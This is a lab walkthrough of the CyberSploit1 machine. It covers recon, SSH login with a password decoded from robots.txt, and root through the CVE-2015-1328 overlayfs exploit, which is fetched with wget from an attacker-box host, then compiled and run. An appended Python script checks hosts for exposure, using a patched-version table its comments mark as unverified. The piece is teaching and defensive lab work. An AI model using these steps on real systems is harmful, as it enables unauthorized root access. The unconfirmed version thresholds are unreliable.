This is a walkthrough of the machine CyberSploit1 from OffSec's Proving Grounds Play labs.
Machine information:
- Level: Easy
- Community rating: Easy
- Flags: 2
- OS: Linux
- Vector: SSH, local
Nmap
sudo nmap -A --open -sV -sC -v -p- <IP>
Starting off with an Nmap scan, we discover the following open ports:
- 22 - SSH
- 80 - HTTP

Webapp
The page does not provide any useful information straight away:

However, looking at the page's source, we discover the username itsskv:

Next, we perform some basic enumeration manually, and discover a base64-encoded string at /robots.txt:

Decoding this string reveals a possible password:
echo "Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0=" | base64 -d

Initial access
Using the discovered username and decoded password, we can SSH in and obtain the first local.txt flag:
ssh itsskv@<IP>

Privilege escalation
Checking the kernel version, we discover that it is vulnerable to CVE-2015-1328 (the overlayfs local privilege escalation in Ubuntu kernels):
uname -a

searchsploit 3.13.0

searchsploit -m 37292
Taking a look at the PoC, we will need to transfer it from our attack machine to the victim machine, then compile and execute it there:

Firstly, we start up a simple HTTP server to serve the file on our attack box:
python3 -m http.server 80
Next, we fetch the file on the victim machine:
wget http://<ATTACK_BOX_IP>/37292.c
Lastly, we compile the exploit, make the binary executable and run it to obtain the second proof.txt flag:
gcc 37292.c -o ofs
chmod +x ofs
./ofs
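The same kernel check, seen from the defender's side: the walkthrough identifies the host from its `uname -a` output, and a fleet audit can do the same thing without ever running an exploit. The example below is added here and is not part of the original walkthrough; it parses an Ubuntu-style `uname -r` string, compares the ABI number against the patched package versions (the thresholds are assumed from the Ubuntu advisories that fixed CVE-2015-1328 and should be verified against the USNs), and confirms whether overlayfs is even registered in `/proc/filesystems`, since the bug lives in that module. The sample inputs are constructed.

```python
import platform
import re
from typing import Optional, Tuple

# Ubuntu kernel ABI numbers believed to carry the CVE-2015-1328 fix.
# ASSUMPTION: taken from memory of the June 2015 Ubuntu Security Notices;
# verify against the USN for each release before relying on this table.
PATCHED_ABI = {
    "3.2.0": 86,    # Ubuntu 12.04 (precise)
    "3.13.0": 54,   # Ubuntu 14.04 (trusty), the series seen on this box
    "3.16.0": 41,   # Ubuntu 14.10 (utopic)
    "3.19.0": 21,   # Ubuntu 15.04 (vivid)
}

# Ubuntu release strings look like "3.13.0-32-generic": base-ABI-flavour.
UNAME_RE = re.compile(r"^(\d+\.\d+\.\d+)-(\d+)-([\w-]+)$")

# Constructed samples standing in for `uname -r` and /proc/filesystems.
SAMPLE_UNAME = "3.13.0-32-generic"
SAMPLE_PROC_FS = "nodev\tsysfs\nnodev\tproc\n\text4\nnodev\toverlayfs\n"


def parse_release(release: str) -> Optional[Tuple[str, int, str]]:
    """Split an Ubuntu `uname -r` string into (base, abi, flavour).

    Returns None for strings that are not in the Ubuntu package format,
    so the caller can report them rather than guess.
    """
    m = UNAME_RE.match(release.strip())
    if not m:
        return None
    base, abi, flavour = m.groups()
    return base, int(abi), flavour


def overlayfs_available(proc_filesystems: str) -> bool:
    """True if the kernel registers overlayfs (older name) or overlay."""
    names = (line.split()[-1] for line in proc_filesystems.splitlines() if line.strip())
    return any(name in ("overlayfs", "overlay") for name in names)


def assess(release: str, proc_filesystems: str) -> str:
    """Classify a host for CVE-2015-1328 exposure from two strings.

    Possible results: "unknown-format", "not-in-table", "patched",
    "vulnerable-kernel-no-overlayfs", "vulnerable".
    """
    parsed = parse_release(release)
    if parsed is None:
        return "unknown-format"
    base, abi, _flavour = parsed
    if base not in PATCHED_ABI:
        return "not-in-table"
    if abi >= PATCHED_ABI[base]:
        return "patched"
    if not overlayfs_available(proc_filesystems):
        # Kernel series is affected but the module is not registered;
        # still worth patching, but the known exploit path is absent.
        return "vulnerable-kernel-no-overlayfs"
    return "vulnerable"


def assess_live() -> str:
    """Run the check against the current Linux host (not used by the demo)."""
    with open("/proc/filesystems", encoding="utf-8") as fh:
        return assess(platform.release(), fh.read())


if __name__ == "__main__":
    # Demo on the constructed samples; prints "3.13.0-32-generic: vulnerable".
    print(f"{SAMPLE_UNAME}: {assess(SAMPLE_UNAME, SAMPLE_PROC_FS)}")
```

The practical mitigation is the one the table encodes: move the host to a kernel at or past the fixed ABI, and where overlayfs is not needed, keep the module from being loaded so the affected code is never reachable. On a real host the same logic is fed by `platform.release()` and `/proc/filesystems`, as `assess_live()` shows.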

